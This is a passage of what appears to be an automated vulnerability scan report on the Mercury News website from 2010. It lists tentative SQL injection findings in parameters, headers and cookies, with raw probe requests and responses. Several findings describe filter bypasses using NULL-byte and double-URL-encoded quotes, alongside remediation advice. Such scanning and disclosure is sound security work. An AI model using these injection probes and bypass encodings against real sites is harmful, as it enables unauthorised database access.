GET /breaking-news/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0''; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/breaking-news/ci_16799883?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:38:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:38:32 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
1.173. http://www.mercurynews.com/breaking-news/ci_16800002 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/breaking-news/ci_16800002
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /breaking-news/ci_16800002?1%00'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Santa Clara County Board of Supervisors voted unanimously to cap the unused days of vac ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /breaking-news/ci_16800002?1%00''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/breaking-news/ci_168 ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /business/ci_16792615 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/business/ci_16792615 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /business/ci_16792615?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /business/ci_16792615?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]...
1.177. http://www.mercurynews.com/business/ci_16792615 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/business/ci_16792615
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /business/ci_16792615?1%00'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16792615?1%00''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/business/ci_16792615 ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /business/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669'';
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/business/ci_16799883?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:41:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:41:08 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /business/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/business/ci_16799883?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:40:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:40:20 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /business/ci_16799954 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Microsoft is tweaking its Internet Explorer with an upcoming feature that will let users ad ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /business/ci_16799954 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/business/ci_16799954 ...[SNIP]...
